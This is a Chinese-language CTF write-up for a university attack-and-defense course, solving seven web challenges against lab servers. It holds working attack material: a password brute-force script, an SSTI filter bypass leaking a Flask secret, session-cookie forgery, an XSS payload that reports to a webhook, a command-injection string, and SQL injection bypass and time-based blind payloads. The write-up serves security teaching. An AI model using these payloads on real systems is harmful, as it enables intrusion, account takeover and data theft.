# 電腦攻擊與防禦 (Attack & Defense) Project2 Writeup ###### tags: `CTF` `NCU-Attack&Defense` `ADL-Project` ### 1. monster @Quisette header: * x-forwarded-for: 127.0.0.1 * referer: https://www.adlSecurity.com rockyou 是 password database, brute force: ```python= from base64 import b64encode import requests def basic_auth(username, password): token = b64encode(f"{username}:{password}".encode('utf-8')).decode("ascii") auth = f'Basic {token}' return auth response = requests.request( method="GIVEMEFLAG", url='http://ctf.adl.tw:12002/', headers=headers, timeout= 2, ) # print(response.content.decode('utf-8')) file1 = open('rockyou.txt', 'r', encoding='latin-1') lines = file1.readlines() count = 0 for line in lines: s = line.strip() count += 1 if count <= 31616: continue if not s.startswith("hi"): continue print("{}) try: hitori & {}".format(count, s)) headers['Authorization'] = basic_auth('hitori', s) try: response = requests.request(method="GIVEMEFLAG",url='http://ctf.adl.tw:12002/admin',headers=headers) except: pass if 'You have not been verified' not in response.text: print('Find! ', s) break ``` pass: `hitorijanai` ``` ADL{h77p_23qu357_h34d32_m0d1f13d!!!!_https://youtu.be/Gc3NKC8TQtY} ``` --- ### 2. flag_store `@Gsauce` 一開始使用 `admin` 登入，發現一個 username hint:  這裡需要在登入頁面，進行 SSTI 攻擊。 Attack string: `{{con_fig}}` 因為 filter 會過濾底線，而 config 的過濾順序在底線之前： ```python # app.py, line 82 blacklist = ['config', '_', 'os', 'init', '.', 'builtin', 'mro', 'cat', 'id', 'self', 'context', 'function', 'local', 'request', 'session', 'base', 'url_for', 'globals'] ``` 所以過濾後，`{{con_fig}}` 會變成 `{{config}}`。 放入 Jinja template 中，就可以得到 app config data。當中包含 secret key，可以用來生成 session cookie: ``` 'SECRET_KEY': 'ihfoajfdlngalskfnglnsljgaaskdhglmasdlglasdg' ``` 使用 [`flask-unsign`](https://github.com/Paradoxis/Flask-Unsign)，生成新的 session cookie: ```bash $ flask-unsign --sign --cookie "{'user': '1mv32yv32y21ch'}" --secret 'ihfoajfdlngalskfnglnsljgaaskdhglmasdlglasdg' ``` Cookie: `eyJ1c2VyIjoiMW12MzJ5djMyeTIxY2gifQ.ZXkn2A.6_Keq3lEj9SMEHPWRvqRaQ9asBA` 將這個 cookie 放入瀏覽器 (HTTP Request)，就可以登入為`1mv32yv32y21ch` ，並購買 flag:  Flag: `ADL{17'5_4_21p-0ff!!!!.f149_15_700_3xp3n51v3}` --- ### 3. Meow ```python= import requests import json import time dest = "http://140.115.59.7:12004/api/" # r = requests.get(dest) # print(r.content) r = requests.post(dest + "start") print(r.content) # print() eid = r.headers["Set-Cookie"].split(";")[0] print(eid) headers ={ 'Accept': '*/*', 'Accept-Language': 'zh-TW,zh', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Content-Type': 'application/json', 'Cookie': eid, 'Origin': 'http://140.115.59.7:12004', 'Pragma': 'no-cache', 'Referer': 'http://140.115.59.7:12004/', 'Sec-GPC': '1', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', } def score(payload): r = requests.post(dest + "start") req = requests.post(dest + "submit", data=json.dumps(payload), headers=headers, verify=False) res = requests.get(dest + "score", headers={'Cookie': eid}) return json.loads(res.content)['data']['score'] def flag(payload): r = requests.post(dest + "start") req = requests.post(dest + "submit", data=json.dumps(payload), headers=headers, verify=False) res = requests.get(dest + "score", headers={'Cookie': eid}) return json.loads(res.content)['data']['flag'] old = [[4 for _ in range(10)] for _ in range(10)] # any value except 0123 for i in range(10): for j in range(10): oldscore = score(old) # print(oldscore) newscore = 0 for k in [0,1,2,3]: test = old test[i][j] = k newscore = score(test) if newscore > oldscore: old[i][j] = k oldscore = newscore print("new", newscore, k) break if oldscore == 100: print(flag(old)) ``` --- ### 4. msg-board reference: https://hackmd.io/@jcxyisncu1111/adctf/%2FMu5KjNvpQW-sl4qHbBMDGQ <!-- https://owasp.org/www-community/attacks/xss/ --> 有用的是 `<link rel=stylesheet href=87 onerror={script}`>，帶入 webhook 即可 記得 webhook 要換成自己生成的webhook 之後就可以看到 server 戳進來的訊息  flag get, 好耶 ``` ADL{51mp1e_R3fl3c7!X55_4774ck} ``` 訊息發送之後，原網頁會直接跳轉，要先存好 payload QQ --- ### 5. command injection `@Gsauce` 使用 `ls` 指令，獲取路徑中的檔案：  使用 `ls -al` 指令，獲取路徑中檔案詳情（大小）：  Attack string: ``` ' `grep '' \`find . -type f -size 20c\`` # ``` 透過 `find . -type f -size 20c\` inline execution，根據檔案大小取得 ./flag 這個檔案（因為不能直接輸入 flag） 且因為不能使用 `cat`，所以利用 `grep '' {FILENAME}` 來印出檔案的內容 後面的 `#` 是為了使 php 後面的程式碼變註解 ` `` ` 在 `bash` 中是代表執行程式碼  Flag: `ADL{QQQQQqqqqqQQQQQ}` --- ### 6. sql-injection-1 (沒打出來) 原本疊珠套娃不能用了，想個辦法繞過去？ ``` ' UNISELECTON SELUNIONECT 'idtjohn88', 'a', NULL-- ' UNISELECTON SELUNIONECT 'idtjohn88', NULL, 'a'-- ' UNISELECTON SELUNIONECT NULL, 'idtjohn88', 'a'-- ' UNISELECTON SELUNIONECT 'idtjohn88', 'a', NULL-- ' UNISELECTON SELUNIONECT 'idtjohn88', NULL, 'a'-- ' UNISELECTON SELUNIONECT NULL, 'idtjohn88', 'a', NULL-- ' UUNIONINON SESELECTLECT NULL, 'idtjohn88', 'a'-- ``` (wip) ... `@Gsauce`： 嘗試過用 [`sqlmap`](https://github.com/sqlmapproject/sqlmap) 去掃漏洞，發現 Time-based blind attack 可以運作：  以下為測試過的 Attack strings: ``` // 1. 這會有效果 ' RLIKE SLEEP(1) -- f // 2. 這會跳一個 mysqli error message (syntax error) ' RLIKE '*' --f // 3. 會 Timeout ' UNION ... ``` 6. SQL_Injection1  > http://140.115.59.7:12005/?source=1  Injection point ```mysql $sql = "SELECT * FROM users WHERE `username` = '$username' AND `password` = '$password';"; ``` - DBMS: mysql - 過濾 ```mysql $blacklist = array("ununionion", "union", "selselectect", "select", "where", "and", "or"); ``` - 不好串query ```mysql $query = mysqli_query($link, $sql); ``` - username = idtjohn88 ```mysql if ($fetch["username"] === 'idtjohn88' && $fetch["password"] === $password) { $loginStatus = True; break; } ``` -> "ununionion" blacklist payload: ```mysql - ' UNIUNIONON SELSELECTECT NULL, 'kita0421', 'a'-- - ' UNIUNIONON SELSELECTECT 'kita0421', NULL, 'a'-- - ' UNIUNIONON SELSELECTECT 'kita0421', 'a', NULL-- ``` ### 7. SQL_Injection2 盲注Payload ```mysql ' OR IF((BINARY SUBSTRING((SELECT `password` from users LIMIT 1 OFFSET 487),63,1)='a'),SLEEP(1),0) -- ``` 用 SLEEP(1) 爆破 ->Leak出資料庫